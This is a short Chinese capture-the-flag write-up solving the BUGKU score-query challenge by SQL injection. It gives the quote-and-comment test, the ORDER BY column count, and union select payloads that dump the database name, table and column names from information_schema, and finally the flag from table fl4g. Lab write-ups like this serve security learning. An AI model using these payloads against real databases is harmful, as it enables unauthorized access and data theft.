BUGKU成绩查询

题目地址:http://123.206.87.240:8002/chengjidan/index.php

看到题目有个输入框,随便输入,发现可能具有sql注入漏洞

BUGKU成绩查询_第1张图片

 post方式id=1‘,加一个分号发现错误,又使用#注释符之后,发现返回正常

随后使用order by语句测试有几列,经过测试一共有四列

BUGKU成绩查询_第2张图片

 随后就开始进行注入

先爆库:id=0'union select 1,2,3,database()#

BUGKU成绩查询_第3张图片

在爆表:id=0'union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema='skctf_flag'#

 BUGKU成绩查询_第4张图片

可以发现,有两个表,我们挑那个名字比较敏感的fl4g表进行爆列

爆列:id=0'union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='fl4g'#

BUGKU成绩查询_第5张图片

可以发现只有一列skctf——flag

最后进行爆数据就ok

payload:id=0'union select 1,2,3,skctf_flag from fl4g#

BUGKU成绩查询_第6张图片

你可能感兴趣的:(mysql)